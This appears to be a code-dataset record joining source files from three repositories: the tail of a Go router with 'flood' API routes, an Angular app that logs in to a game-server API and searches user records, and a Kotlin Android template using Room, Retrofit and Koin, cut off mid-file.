mtn.Post("/floodapi/edit", handler.EditFloodApi)
mtn.Post("/floodapi/add", handler.AddFloodApi)
//flood target
mtn.Get("/floodtargetview", handler.GetfloodTargets)
mtn.Post("/floodtarget/one", handler.GetFloodTarget)
mtn.Post("/floodtarget/edit", handler.EditfloodTarget)
mtn.Post("/floodtarget/add", handler.AddfloodTarget)
go http.ListenAndServe(*portPtr, mtn)
}
select {}
}
|
868e9759552e18317b542044f067a87bb6ce7b3c
|
[
"JavaScript",
"SQL",
"Go",
"Markdown"
] | 25 |
Go
|
huzorro/ospider
|
1ece9a83fa6c33b66adf5af4d8d4e8d453eae06b
|
2c85993d2baf8be9a12b4ad3c1eddd8b517b9bc0
|
refs/heads/master
|
<file_sep>export class LicensesModel{
constructor(
public weapon:string
){
}
}<file_sep>import { Injectable } from '@angular/core';
import { HttpClient, HttpHeaders } from '@angular/common/http';
import { Observable } from 'rxjs';
import { Global } from './global';
import { AuthModel } from '../models/authModel';
@Injectable()
export class UsuarioService {
private URLUsers: string;
constructor(private _http: HttpClient) {
this.URLUsers = Global.URLUsers;
}
getLogin(user: AuthModel): Observable<any> {
let header = new HttpHeaders()
.set('password', <PASSWORD>)
.set('user', user.user);
return this._http.post(Global.URLAuthentication, '', { headers: header });
}
getUsuarios(): Observable<any> {
let headers = new HttpHeaders().set(
'access-token',
localStorage.getItem('token')
);
return this._http.get(this.URLUsers, { headers: headers });
}
}
<file_sep>import { BrowserModule } from '@angular/platform-browser';
import { NgModule } from '@angular/core';
import { AppRoutingModule } from './app-routing.module';
import { AppComponent } from './app.component';
import { LoginComponent } from './components/login/login.component';
import { CardsComponent } from './components/cards/cards.component';
import { BuscadorComponent } from './components/buscador/buscador.component';
import { UserComponent } from './components/user/user.component';
import {UsuarioService} from './service/usuarios';
import { HttpClientModule } from '@angular/common/http';
import { FormsModule } from '@angular/forms';
import {NgxPaginationModule} from 'ngx-pagination';
import { GeneroPipe } from './pipes/genero.pipe';
import { MayusculasPipe } from './pipes/mayusculas.pipe';
import { AuthGuard } from './service/authguard';
import {JobsService} from './service/jobs';
import { MayusculaPipe } from './pipes/mayuscula.pipe';
@NgModule({
declarations: [
AppComponent,
LoginComponent,
CardsComponent,
BuscadorComponent,
UserComponent,
GeneroPipe,
MayusculasPipe,
MayusculaPipe,
],
imports: [
BrowserModule,
AppRoutingModule,
HttpClientModule,
FormsModule,
NgxPaginationModule
],
providers: [UsuarioService, AuthGuard, JobsService],
bootstrap: [AppComponent]
})
export class AppModule { }
<file_sep>export class VehiclesModel{
constructor(
public model: string,
public plate: string
) {
}
}<file_sep>export class JobGradesModel {
constructor(
public grade: string,
public salary: number,
public skin_male: [],
public label: string,
public name: string,
public job_name: string,
) {
}
}<file_sep>import { Injectable } from "@angular/core";
import {Observable} from 'rxjs';
import {HttpClient, HttpHeaders} from '@angular/common/http';
import { Global } from './global';
@Injectable()
export class JobsService {
constructor(private _http: HttpClient) {
}
public getJobs():Observable<any>{
let headers = new HttpHeaders().set(
'access-token',
localStorage.getItem('token')
);
return this._http.get(Global.URLJobs, {headers: headers});
}
}<file_sep>import { Component, EventEmitter, Input, OnInit, Output } from '@angular/core';
import { JobGradesModel } from 'src/app/models/jobGradesModel';
import { JobsModel } from 'src/app/models/jobsModel';
import { UserModel } from 'src/app/models/userModel';
@Component({
selector: 'app-cards',
templateUrl: './cards.component.html',
styleUrls: ['./cards.component.css'],
})
export class CardsComponent implements OnInit {
@Input() usuario: UserModel;
@Input() trabajo: JobsModel;
constructor() {
console.log(this.usuario)
}
ngOnInit(): void {
console.log(this.usuario)
}
}
<file_sep>import { Component, EventEmitter, Input, OnInit, Output } from '@angular/core';
import { JobGradesModel } from 'src/app/models/jobGradesModel';
import { JobsModel } from 'src/app/models/jobsModel';
import { UserModel } from 'src/app/models/userModel';
@Component({
selector: 'app-user',
templateUrl: './user.component.html',
styleUrls: ['./user.component.css'],
})
export class UserComponent implements OnInit {
@Input() usuario: UserModel;
@Output() close = new EventEmitter();
@Input() trabajo: JobGradesModel;
constructor() {}
ngOnInit(): void {
}
closeModal() {
this.close.emit();
}
}
<file_sep>import { JobGradesModel } from './jobGradesModel';
export class JobsModel {
constructor(
public label : string,
public name: string,
public job_grades: JobGradesModel
) {
}
}<file_sep>import { Component, ElementRef, OnInit, ViewChild } from '@angular/core';
import { UsuarioService } from 'src/app/service/usuarios';
import * as $ from 'jquery/dist/jquery.js';
import { UserModel } from 'src/app/models/userModel';
import { JobsService } from 'src/app/service/jobs';
import { JobsModel } from 'src/app/models/jobsModel';
import { JobGradesModel } from 'src/app/models/jobGradesModel';
import { Router } from '@angular/router';
import '@popperjs/core/dist/umd/popper.min.js';
@Component({
selector: 'app-buscador',
templateUrl: './buscador.component.html',
styleUrls: ['./buscador.component.css'],
})
export class BuscadorComponent implements OnInit {
@ViewChild('search') search: ElementRef;
public users: Array<UserModel>;
paginaActual: number = 1;
public mostrarModal: boolean;
public usuario: UserModel;
public trabajos: Array<JobsModel>;
public trabajo: JobsModel;
public jobGradels: Array<JobGradesModel>;
public jobGradel: JobGradesModel;
public aux: number;
constructor(
private _servicio: UsuarioService,
private _serviceJob: JobsService,
private _router: Router
) {
this.users = [];
this.mostrarModal = false;
this.aux = 1;
}
ngOnInit(): void {
}
cerrarSesion(opcion?: number) {
if (opcion == 1) {
localStorage.removeItem('token');
this._router.navigate(['/']);
} else if (opcion == 0) {
document.getElementById('modalLogOut').style.visibility = 'hidden';
} else {
document.getElementById('modalLogOut').style.visibility = 'visible';
}
}
jobs() {
this._serviceJob.getJobs().subscribe((res) => {
this.trabajos = Object.values(res);
this.trabajos.filter((j) => {
if (j.name == this.usuario.job) {
this.trabajo = j;
this.trabajos = Object.values(j);
this.jobGradels = Object.values(this.trabajos[2]);
for (let i = 0; i < this.jobGradels.length; i++) {
if (this.jobGradels[i].grade == this.usuario.job_grade) {
this.trabajo.job_grades = this.jobGradels[i];
}
}
}
});
});
}
verUsuario(select) {
this.mostrarModal = true;
this.usuario = this.users[select];
this.usuario.licenses = Object.values(this.usuario.licenses);
this.usuario.vehicles = Object.values(this.usuario.vehicles);
this.jobs();
}
mostrarUsuario() {
console.log()
this.users = [];
this.aux = 1;
this._servicio.getUsuarios().subscribe(
(res) => {
for (let i = 0; i < res.length; i++) {
var nombre = res[i].identity.name.toLowerCase();
var first = res[i].identity.firstname.toLowerCase();
var second = res[i].identity.secondname.toLowerCase();
var searchData = this.search.nativeElement.value
.replaceAll(' ', '')
.toLowerCase();
if (
nombre == searchData ||
nombre + first == searchData ||
nombre + first + second == searchData ||
first == searchData ||
second == searchData ||
first + second == searchData
) {
this.users.push(res[i]);
this.paginacion('flex');
}
}
if (this.users.length <= 0) {
this.aux = 0;
}
},
(error) => {}
);
}
paginacion(opcion): void {
$(document).ready(function () {
$('.ngx-pagination').css('display', opcion);
});
}
close(event) {
this.users = [];
this.usuario = null;
this.search.nativeElement.value = '';
this.paginacion('none');
}
}
<file_sep>import { Component, ElementRef, OnInit, ViewChild } from '@angular/core';
import { AuthModel } from 'src/app/models/authModel';
import { UsuarioService } from 'src/app/service/usuarios';
import { Router } from '@angular/router';
@Component({
selector: 'app-login',
templateUrl: './login.component.html',
styleUrls: ['./login.component.css'],
})
export class LoginComponent implements OnInit {
@ViewChild('usuario') usuario: ElementRef;
@ViewChild('contrasena') contrasena: ElementRef;
public user: AuthModel;
constructor(private _service: UsuarioService, private _router: Router) {}
ngOnInit(): void {}
login() {
this.user = new AuthModel(
this.usuario.nativeElement.value,
this.contrasena.nativeElement.value
);
this._service.getLogin(this.user).subscribe(
(res) => {
if (res.auth) {
localStorage.setItem('token', res.token);
this._router.navigate(['buscador']);
}
},
(error) => {
console.log(error);
}
);
}
}
<file_sep>import { IdentityModel } from './identityModel';
import { LicensesModel } from './licensesModel';
import { VehiclesModel } from './vehiclesModel';
export class UserModel{
constructor(
public identifier:string,
public identity: IdentityModel,
public job: string,
public job_grade: string,
public licenses: Array< LicensesModel>,
public bank_money: string,
public phone_calls: [],
public phone_number: string,
public validated: boolean,
public house_id: string,
public vehicles:Array< VehiclesModel>
){}
}<file_sep>export class IdentityModel{
constructor(
public name: string,
public firstname: string,
public secondname: string,
public sex: string,
public dateofbirth: string,
public height: string
){}
}<file_sep>export var Global = {
URLAuthentication:"http://192.168.127.12:30120/S2VAPI/authenticate",
URLUsers:"http://192.168.127.12:30120/S2VAPI/users",
URLJobs: "http://192.168.127.12:30120/S2VAPI/jobs",
urllocal:'http://localhost:3000/'
};<file_sep>import { Pipe, PipeTransform } from '@angular/core';
@Pipe({
name: 'genero'
})
export class GeneroPipe implements PipeTransform {
transform(value: unknown): string {
if(value == 'm'){
return 'Hombre'
}else{
return 'Mujer';
}
}
}
|
019d721f9327febf8dafcc1b9c61717407f83afc
|
[
"TypeScript"
] | 15 |
TypeScript
|
carlotaLobo/supernenas-sogeti
|
4537e8428f5e05e629d8c3c42435283c43573def
|
d648b2ed19c37fd86d76c819b9ad0f68cc950d84
|
refs/heads/master
|
<file_sep>package com.example.template.user
import com.example.template.tools.base.BaseViewModel
import com.example.template.useCases.UserUseCase
class UserViewModel(
userRepository: UserUseCase
) : BaseViewModel() {
val items = userRepository.getUsers()
}<file_sep>package com.example.template.remote.model
import com.example.template.model.Company
data class CompanyDto(
val bs: String,
val catchPhrase: String,
val name: String
)
fun CompanyDto.toCompany() = Company(
bs,
catchPhrase,
name
)<file_sep>package com.example.template.model
import com.example.template.cache.model.AddressEntity
data class Address(
val city: String,
val geo: Geo,
val street: String,
val suite: String,
val zipcode: String
)
internal fun Address.toAddressEntity() = AddressEntity(
city,
geo.toGeoEntity(),
street,
suite,
zipcode
)<file_sep>package com.example.template.remote
import retrofit2.Response
internal abstract class BaseRemoteRepository {
fun <T, D : Any> Response<T>.convertToOutput(mapFunction: (T) -> D): Output<D> {
if (!isSuccessful)
return Output.Error(ErrorEnum.NOT_SUCCESSFULLY)
return try {
val data = body()!!
val mappedData = mapFunction(data)
Output.Success(mappedData)
} catch (cce: ClassCastException) {
Output.Error(ErrorEnum.MAP_CAST_EXCEPTION)
}
}
}<file_sep>package com.example.template.cache
import androidx.room.Database
import androidx.room.RoomDatabase
import androidx.room.TypeConverters
import com.example.template.cache.user.UserDao
import com.example.template.cache.model.PostEntity
import com.example.template.cache.model.UserEntity
import com.example.template.cache.post.PostDao
@Database(
entities = [UserEntity::class, PostEntity::class],
version = 2
)
@TypeConverters(DatabaseConverters::class)
internal abstract class MyDatabase : RoomDatabase() {
abstract fun getUserDao(): UserDao
abstract fun getPostsDao(): PostDao
}<file_sep>package com.example.template.di
import com.example.template.cache.DatabaseClient
import com.example.template.cache.MyDatabase
import com.example.template.cache.post.PostCacheRepository
import com.example.template.cache.post.PostCacheRepositoryImpl
import com.example.template.cache.user.UserCacheRepository
import com.example.template.cache.user.UserCacheRepositoryImpl
import com.example.template.remote.ApiUtils
import com.example.template.remote.OkHttp
import com.example.template.remote.user.UserRemoteRepository
import com.example.template.remote.user.UserRemoteRepositoryImpl
import com.example.template.remote.user.UserService
import com.example.template.remote.user.UserServiceImpl
import okhttp3.Interceptor
import org.koin.dsl.module
internal object DataKoinModules {
val dataModules = listOf(
remoteModules(),
cacheModules(),
repoModules()
)
private fun remoteModules() = module {
single<Interceptor> { OkHttp.getLogsInterceptor() }
single { OkHttp.getClient(get()) }
single { ApiUtils.getUserInterface(get()) }
single<UserService> { UserServiceImpl(get()) }
}
private fun cacheModules() = module {
single { DatabaseClient.getInstance(get()) }
single { get<MyDatabase>().getUserDao() }
single { get<MyDatabase>().getPostsDao() }
}
private fun repoModules() = module {
single<UserRemoteRepository> { UserRemoteRepositoryImpl(get()) }
single<UserCacheRepository> { UserCacheRepositoryImpl(get()) }
single<PostCacheRepository> { PostCacheRepositoryImpl(get()) }
}
}<file_sep>package com.example.template.cache.post
import androidx.lifecycle.LiveData
import androidx.lifecycle.Transformations
import com.example.template.cache.model.toPosts
import com.example.template.model.Post
import com.example.template.model.toEntities
interface PostCacheRepository {
fun getAllPosts(userId: Int): LiveData<List<Post>>
suspend fun savePosts(posts: List<Post>)
}
internal class PostCacheRepositoryImpl(private val postDao: PostDao) : PostCacheRepository {
override fun getAllPosts(userId: Int): LiveData<List<Post>> =
Transformations.map(postDao.getPosts(userId)) { it.toPosts() }
override suspend fun savePosts(posts: List<Post>) {
postDao.insert(posts.toEntities())
}
}<file_sep>package com.example.template.tools.base
import androidx.lifecycle.ViewModel
abstract class BaseViewModel(): ViewModel()<file_sep>package com.example.template.remote.user
import com.example.template.model.Post
import com.example.template.model.User
import com.example.template.remote.BaseRemoteRepository
import com.example.template.remote.Output
import com.example.template.remote.model.toPosts
import com.example.template.remote.model.toUsers
interface UserRemoteRepository {
suspend fun getUsers(): Output<List<User>>
suspend fun getPosts(userId: Int): Output<List<Post>>
}
internal class UserRemoteRepositoryImpl(private val userService: UserService) :
UserRemoteRepository, BaseRemoteRepository() {
override suspend fun getUsers() =
userService.getUsers().convertToOutput {
it.toUsers()
}
override suspend fun getPosts(userId: Int) = userService.getPosts(userId).convertToOutput {
it.toPosts()
}
}<file_sep>package com.example.template.di
import com.example.template.DataFactory
import com.example.template.useCases.PostUseCase
import com.example.template.useCases.PostUseCaseImpl
import com.example.template.useCases.UserUseCase
import com.example.template.useCases.UserUseCaseImpl
import org.koin.dsl.module
internal object DomainKoinModules {
val domainModules = listOf(useCaseModules(), dataRepositoryModules())
private fun useCaseModules() = module {
factory<UserUseCase> { UserUseCaseImpl(get(), get()) }
factory<PostUseCase> { PostUseCaseImpl(get(), get()) }
}
private fun dataRepositoryModules() = module {
single { DataFactory.userRemoteRepository }
single { DataFactory.userCacheRepository }
single { DataFactory.postCacheRepository }
}
}<file_sep>package com.example.template.cache.model
import androidx.room.*
import com.example.template.cache.tools.BaseEntityItem
import com.example.template.model.Post
@Entity(
tableName = PostEntity.TABLE_NAME,
foreignKeys = [
ForeignKey(
entity = UserEntity::class,
parentColumns = [UserEntity.COLUMN_ID],
childColumns = [PostEntity.COLUMN_USER_ID],
onDelete = ForeignKey.CASCADE
)],
indices = [Index(PostEntity.COLUMN_USER_ID)]
)
internal data class PostEntity(
@PrimaryKey
@ColumnInfo(name = COLUMN_ID)
override val id: Long,
val body: String,
val title: String,
@ColumnInfo(name = COLUMN_USER_ID)
val userId: Int
) : BaseEntityItem {
companion object {
const val TABLE_NAME = "table_post"
const val COLUMN_ID = "post_id"
const val COLUMN_USER_ID = "user_id_child"
}
}
internal fun PostEntity.toPost() = Post(
id.toInt(),
body,
title,
userId
)
internal fun List<PostEntity>.toPosts() = map { it.toPost() }<file_sep>package com.example.template
import android.os.Bundle
import androidx.appcompat.app.AppCompatActivity
import androidx.navigation.NavController
import androidx.navigation.findNavController
import androidx.navigation.ui.AppBarConfiguration
import androidx.navigation.ui.NavigationUI
import androidx.navigation.ui.setupActionBarWithNavController
import kotlinx.android.synthetic.main.toolbar.*
class MainActivity : AppCompatActivity() {
private lateinit var navController: NavController
private val appBarConfiguration by lazy {
AppBarConfiguration.Builder(navController.graph).build()
}
override fun onCreate(savedInstanceState: Bundle?) {
super.onCreate(savedInstanceState)
setContentView(R.layout.activity_main)
navController = findNavController(R.id.nav_host_fragment)
setupActionBar()
}
private fun setupActionBar() {
setSupportActionBar(toolbar)
setupActionBarWithNavController(navController)
}
override fun onSupportNavigateUp() = NavigationUI.navigateUp(navController, appBarConfiguration)
}
<file_sep>package com.example.template.tools.base
import android.view.LayoutInflater
import android.view.ViewGroup
import androidx.databinding.DataBindingUtil
import androidx.databinding.ViewDataBinding
import androidx.recyclerview.widget.DiffUtil
import androidx.recyclerview.widget.ListAdapter
import androidx.recyclerview.widget.RecyclerView
import com.example.template.tools.BaseItem
abstract class BaseAdapter<T : BaseItem> : ListAdapter<T, BaseViewHolder>(BaseDiffUtil<T>()) {
override fun onCreateViewHolder(parent: ViewGroup, viewType: Int): BaseViewHolder {
val inflater = LayoutInflater.from(parent.context)
val binding: ViewDataBinding = DataBindingUtil.inflate(inflater, getLayout(), parent, false)
return BaseViewHolder(binding)
}
abstract fun getLayout(): Int
override fun onBindViewHolder(holder: BaseViewHolder, position: Int) {
val item = getItem(position)
item?.let {
bindingData(holder.binding, it)
}
}
abstract fun bindingData(binding: ViewDataBinding, item: T)
}
class BaseViewHolder(val binding: ViewDataBinding) : RecyclerView.ViewHolder(binding.root)
class BaseDiffUtil<T : BaseItem> : DiffUtil.ItemCallback<T>() {
override fun areItemsTheSame(oldItem: T, newItem: T) =
oldItem.id == newItem.id
override fun areContentsTheSame(oldItem: T, newItem: T) =
oldItem == newItem
}<file_sep>package com.example.template.model
import com.example.template.cache.model.GeoEntity
data class Geo(
val lat: String,
val lng: String
)
internal fun Geo.toGeoEntity() = GeoEntity(
lat,
lng
)<file_sep>package com.example.template.useCases
internal abstract class BaseUseCase<file_sep>package com.example.template.cache.user
import androidx.lifecycle.LiveData
import androidx.lifecycle.Transformations
import com.example.template.cache.model.toUsers
import com.example.template.cache.tools.diffUtil.BaseDiffCallback
import com.example.template.model.User
import com.example.template.model.toUserEntities
interface UserCacheRepository {
fun getAllUsers(): LiveData<List<User>>
suspend fun saveUsers(users: List<User>)
}
internal class UserCacheRepositoryImpl(private val userDao: UserDao) : UserCacheRepository {
override fun getAllUsers(): LiveData<List<User>> =
Transformations.map(userDao.getAllLiveItems()) { it.toUsers() }
override suspend fun saveUsers(users: List<User>) {
userDao.makeDiff(
BaseDiffCallback(
oldList = userDao.getALlItems(),
newList = users.toUserEntities()
)
)
}
}<file_sep>package com.example.template.useCases
import androidx.lifecycle.LiveData
import androidx.lifecycle.liveData
import com.example.template.cache.post.PostCacheRepository
import com.example.template.model.Post
import com.example.template.remote.Output
import com.example.template.remote.user.UserRemoteRepository
import kotlinx.coroutines.Dispatchers
interface PostUseCase {
fun getPosts(userId: Int): LiveData<List<Post>>
}
internal class PostUseCaseImpl(
private val remote: UserRemoteRepository,
private val cache: PostCacheRepository
) : PostUseCase, BaseUseCase() {
override fun getPosts(userId: Int) = liveData(Dispatchers.IO) {
emitSource(cache.getAllPosts(userId))
val postOutput = remote.getPosts(userId)
if (postOutput is Output.Success)
cache.savePosts(postOutput.data)
}
}<file_sep>package com.example.template
import com.example.template.cache.post.PostCacheRepository
import com.example.template.cache.user.UserCacheRepository
import com.example.template.di.DataKoinComponent
import com.example.template.remote.user.UserRemoteRepository
import org.koin.core.inject
object DataFactory : DataKoinComponent() {
val userRemoteRepository: UserRemoteRepository by inject()
val userCacheRepository: UserCacheRepository by inject()
val postCacheRepository: PostCacheRepository by inject()
}<file_sep>package com.example.template.cache.model
import com.example.template.model.Geo
internal data class GeoEntity(
val lat: String,
val lng: String
)
internal fun GeoEntity.toGeo() = Geo(
lat,
lng
)<file_sep>package com.example.template.cache.model
import androidx.room.ColumnInfo
import com.example.template.model.Company
internal data class CompanyEntity(
val bs: String,
val catchPhrase: String,
@ColumnInfo(name = COLUMN_NAME)
val name: String
) {
companion object {
const val COLUMN_NAME = UserEntity.COMPANY_PREFIX + "column_name"
}
}
internal fun CompanyEntity.toCompany() = Company(
bs,
catchPhrase,
name
)<file_sep>package com.example.template.cache.tools.diffUtil
import com.example.template.cache.tools.BaseEntityItem
interface DiffCallback<T> {
fun getOldItemList(): Collection<T>
fun getNewItemList(): Collection<T>
fun areItemsTheSame(oldItem: T, newItem: T): Boolean
}
internal open class BaseDiffCallback<T : BaseEntityItem>(
private val oldList: List<T>,
private val newList: List<T>
) : DiffCallback<T> {
override fun getOldItemList(): Collection<T> = oldList
override fun getNewItemList(): Collection<T> = newList
override fun areItemsTheSame(oldItem: T, newItem: T) = (oldItem.id == newItem.id)
}
internal class BaseDiffCallbackForItem<T : BaseEntityItem>(
oldItem: T,
newItem: T
) :
BaseDiffCallback<T>(
listOf(oldItem),
listOf(newItem)
)
<file_sep>package com.example.template
import android.app.Application
object DataComponent {
private lateinit var application: Application
fun init(application: Application){
this.application = application
}
fun getAppContext() = application
}<file_sep>package com.example.template.posts
import com.example.template.tools.base.BaseViewModel
import com.example.template.useCases.PostUseCase
class PostViewModel(userId: Int, postUseCase: PostUseCase) :
BaseViewModel() {
val items = postUseCase.getPosts(userId)
}<file_sep>package com.example.template.model
import com.example.template.cache.model.UserEntity
import com.example.template.tools.BaseItem
data class User(
override val id: Int,
val address: Address,
val company: Company,
val email: String,
val name: String,
val phone: String,
val username: String,
val website: String
) : BaseItem
internal fun User.toUserEntity() = UserEntity(
id.toLong(),
address.toAddressEntity(),
company.toCompanyEntity(),
email,
name,
phone,
username,
website
)
internal fun List<User>.toUserEntities() = map { it.toUserEntity() }<file_sep>package com.example.template.cache.model
import com.example.template.model.Address
internal data class AddressEntity(
val city: String,
val geo: GeoEntity,
val street: String,
val suite: String,
val zipcode: String
)
internal fun AddressEntity.toAddress() = Address(
city,
geo.toGeo(),
street,
suite,
zipcode
)<file_sep>const val kotlinVersion = "1.3.61"
object BuildPlugins {
const val buildToolsVersion = "29.0.2"
object Versions {
const val buildGradleVersion = "3.5.3"
const val safeArgs = "1.0.0-alpha04"
}
const val androidGradlePlugin = "com.android.tools.build:gradle:${Versions.buildGradleVersion}"
const val kotlinGradlePlugin = "org.jetbrains.kotlin:kotlin-gradle-plugin:$kotlinVersion"
const val safeArgs = "android.arch.navigation:navigation-safe-args-gradle-plugin:${Versions.safeArgs}"
const val androidApplication = "com.android.application"
const val androidLibrary = "com.android.library"
const val kotlinAndroid = "kotlin-android"
const val kotlinAndroidExtensions = "kotlin-android-extensions"
const val kotlinKapt = "kotlin-kapt"
const val safeArgsPlugin = "androidx.navigation.safeargs"
}
object AndroidSdk {
const val min = 23
const val compile = 29
const val target = compile
}
object Libraries {
private object Versions {
const val appcompat = "1.1.0"
const val constraintLayout = "1.1.3"
const val ktx = "1.1.0"
const val navigation_component = "1.0.0"
const val koin = "2.0.1"
const val moshi = "1.8.0"
const val retrofit = "2.6.0"
const val retrofit_moshi = "2.5.0"
const val retrofit_coroutines = "0.9.2"
const val okhttp = "3.12.0"
const val okhttpInterceptor = "3.11.0"
const val coroutines = "1.3.3"
const val glide = "4.10.0"
const val lifecycleViewmodel = "2.2.0-rc03"
const val room = "2.2.3"
const val legacy = "1.0.0"
const val liveDataKtx = "2.2.0-rc03"
}
const val kotlinStdLib = "org.jetbrains.kotlin:kotlin-stdlib-jdk8:$kotlinVersion"
const val material = "com.google.android.material:material:1.0.0"
const val timber = "com.jakewharton.timber:timber:4.7.1"
const val navigationFragment =
"android.arch.navigation:navigation-fragment-ktx:${Libraries.Versions.navigation_component}"
const val navigationUI =
"android.arch.navigation:navigation-ui-ktx:${Libraries.Versions.navigation_component}"
const val koin = "org.koin:koin-android:${Libraries.Versions.koin}"
const val koinViewmodel = "org.koin:koin-android-viewmodel:${Libraries.Versions.koin}"
const val moshi = "com.squareup.moshi:moshi-kotlin:${Libraries.Versions.moshi}"
const val moshiKapt = "com.squareup.moshi:moshi-kotlin-codegen:${Libraries.Versions.moshi}"
const val retrofit = "com.squareup.retrofit2:retrofit:${Libraries.Versions.retrofit}"
const val retrofitMoshi =
"com.squareup.retrofit2:converter-moshi:${Libraries.Versions.retrofit_moshi}"
const val retrofitCoroutines =
"com.jakewharton.retrofit:retrofit2-kotlin-coroutines-adapter:${Libraries.Versions.retrofit_coroutines}"
const val okhttp = "com.squareup.okhttp3:okhttp:${Libraries.Versions.okhttp}"
const val okhttpInterceptor =
"com.squareup.okhttp3:logging-interceptor:${Libraries.Versions.okhttpInterceptor}"
const val coroutines =
"org.jetbrains.kotlinx:kotlinx-coroutines-android:${Libraries.Versions.coroutines}"
const val coroutinesCore =
"org.jetbrains.kotlinx:kotlinx-coroutines-core:${Libraries.Versions.coroutines}"
const val glide = "com.github.bumptech.glide:glide:${Libraries.Versions.glide}"
const val glideKapt = "com.github.bumptech.glide:compiler:${Libraries.Versions.glide}"
const val liveDataKtx = "androidx.lifecycle:lifecycle-livedata-ktx:${Versions.liveDataKtx}"
object AndroidX {
const val appCompat = "androidx.appcompat:appcompat:${Libraries.Versions.appcompat}"
const val constraintLayout =
"androidx.constraintlayout:constraintlayout:${Versions.constraintLayout}"
const val ktxCore = "androidx.core:core-ktx:${Versions.ktx}"
const val recyclerView = "androidx.recyclerview:recyclerview:1.1.0"
const val lifecycleViewmodel =
"androidx.lifecycle:lifecycle-viewmodel-ktx:${Libraries.Versions.lifecycleViewmodel}"
const val room = "androidx.room:room-runtime:${Libraries.Versions.room}"
const val roomKapt = "androidx.room:room-compiler:${Libraries.Versions.room}"
const val roomKtx = "androidx.room:room-ktx:${Libraries.Versions.room}"
const val legacy = "androidx.legacy:legacy-support-v4:${Libraries.Versions.legacy}"
}
}
object TestLibraries {
private object Versions {
const val junit4 = "4.12"
const val testExt = "1.1.1"
const val espresso = "3.2.0"
}
const val junit4 = "junit:junit:${Versions.junit4}"
const val junitTestExt = "androidx.test.ext:junit:${Versions.testExt}"
const val espresso = "androidx.test.espresso:espresso-core:${Versions.espresso}"
}<file_sep>package com.example.template.cache
import androidx.room.TypeConverter
import com.example.template.cache.model.AddressEntity
import com.example.template.cache.model.CompanyEntity
import com.example.template.cache.model.GeoEntity
import com.squareup.moshi.Moshi
internal class DatabaseConverters {
@TypeConverter
fun encodeAddress(address: AddressEntity) =
Moshi.Builder().build().adapter(AddressEntity::class.java).toJson(address)
@TypeConverter
fun decodeAddress(addressEntityString: String) =
Moshi.Builder().build().adapter(AddressEntity::class.java).fromJson(addressEntityString)!!
@TypeConverter
fun encodeCompany(company: CompanyEntity) =
Moshi.Builder().build().adapter(CompanyEntity::class.java).toJson(company)
@TypeConverter
fun decodeCompany(companyEntityString: String) =
Moshi.Builder().build().adapter(CompanyEntity::class.java).fromJson(companyEntityString)!!
@TypeConverter
fun encodeGeo(geo: GeoEntity) =
Moshi.Builder().build().adapter(GeoEntity::class.java).toJson(geo)
@TypeConverter
fun decodeGeo(geoEntityString: String) =
Moshi.Builder().build().adapter(GeoEntity::class.java).fromJson(geoEntityString)!!
}<file_sep>package com.example.template.tools.extensions
import androidx.fragment.app.FragmentActivity
import androidx.recyclerview.widget.DefaultItemAnimator
import androidx.recyclerview.widget.DividerItemDecoration
import androidx.recyclerview.widget.RecyclerView
fun RecyclerView.addDefaultConfiguration(activity: FragmentActivity?) {
activity?.let {
itemAnimator = DefaultItemAnimator()
addItemDecoration(DividerItemDecoration(it, RecyclerView.VERTICAL))
}
}<file_sep>package com.example.template.cache.user
import androidx.lifecycle.LiveData
import androidx.room.Dao
import androidx.room.Query
import com.example.template.cache.tools.BaseDao
import com.example.template.cache.model.UserEntity
@Dao
internal abstract class UserDao : BaseDao<UserEntity>() {
companion object {
const val GET_USERS = "SELECT * FROM ${UserEntity.TABLE_NAME}"
const val CLEAR_TABLE = "DELETE FROM ${UserEntity.TABLE_NAME}"
}
@Query(GET_USERS)
abstract override fun getAllLiveItems(): LiveData<List<UserEntity>>
@Query(GET_USERS)
abstract override fun getALlItems(): List<UserEntity>
@Query(CLEAR_TABLE)
abstract override suspend fun clearTable()
}<file_sep>package com.example.template.di
import com.example.template.DataComponent
import org.koin.android.ext.koin.androidContext
import org.koin.core.Koin
import org.koin.core.KoinComponent
import org.koin.dsl.koinApplication
abstract class DataKoinComponent : KoinComponent {
private val dataKoin = koinApplication {
androidContext(DataComponent.getAppContext())
modules(DataKoinModules.dataModules)
}
override fun getKoin(): Koin {
return dataKoin.koin
}
}<file_sep>package com.example.template.di
import com.example.template.DomainFactory
import com.example.template.posts.PostViewModel
import com.example.template.user.UserViewModel
import org.koin.android.viewmodel.dsl.viewModel
import org.koin.dsl.module
object PresentationKoinModules {
val presentationModule = listOf(useCaseModules(), viewModelModules())
private fun useCaseModules() = module {
factory { DomainFactory.userUseCase }
factory { DomainFactory.postUseCase }
}
private fun viewModelModules() = module {
viewModel { UserViewModel(get()) }
viewModel { (userId: Int) -> PostViewModel(userId, get()) }
}
}<file_sep>package com.example.template.cache.post
import androidx.lifecycle.LiveData
import androidx.room.Dao
import androidx.room.Query
import com.example.template.cache.model.PostEntity
import com.example.template.cache.tools.BaseDao
@Dao
internal abstract class PostDao : BaseDao<PostEntity>() {
companion object {
const val GET_POSTS = "SELECT * FROM ${PostEntity.TABLE_NAME}"
const val GET_USER_POSTS = GET_POSTS + " WHERE ${PostEntity.COLUMN_USER_ID} = :userId"
const val CLEAR_TABLE = "DELETE FROM ${PostEntity.TABLE_NAME}"
}
@Query(GET_POSTS)
abstract override fun getAllLiveItems(): LiveData<List<PostEntity>>
@Query(GET_POSTS)
abstract override fun getALlItems(): List<PostEntity>
@Query(GET_USER_POSTS)
abstract fun getPosts(userId: Int): LiveData<List<PostEntity>>
@Query(CLEAR_TABLE)
abstract override suspend fun clearTable()
}<file_sep>package com.example.template.user
import android.os.Bundle
import android.view.View
import androidx.navigation.fragment.findNavController
import androidx.recyclerview.widget.RecyclerView
import com.example.template.R
import com.example.template.databinding.FragmentUserBinding
import com.example.template.model.User
import com.example.template.tools.base.BaseBindableFragment
import com.example.template.tools.base.ItemClickListener
import com.example.template.tools.extensions.addDefaultConfiguration
import kotlinx.android.synthetic.main.fragment_user.*
import org.koin.android.viewmodel.ext.android.viewModel
class UserFragment : BaseBindableFragment<FragmentUserBinding>(), ItemClickListener<User> {
private val mViewModel: UserViewModel by viewModel()
private val mAdapter by lazy { UserAdapter(this) }
override fun getLayout() = R.layout.fragment_user
override fun onItemClicked(item: User) {
val userId = item.id
val action = UserFragmentDirections.goToPosts(userId)
findNavController().navigate(action)
}
override fun bindingData(mBinding: FragmentUserBinding) {
mBinding.viewModel = mViewModel
}
override fun onViewCreated(view: View, savedInstanceState: Bundle?) {
super.onViewCreated(view, savedInstanceState)
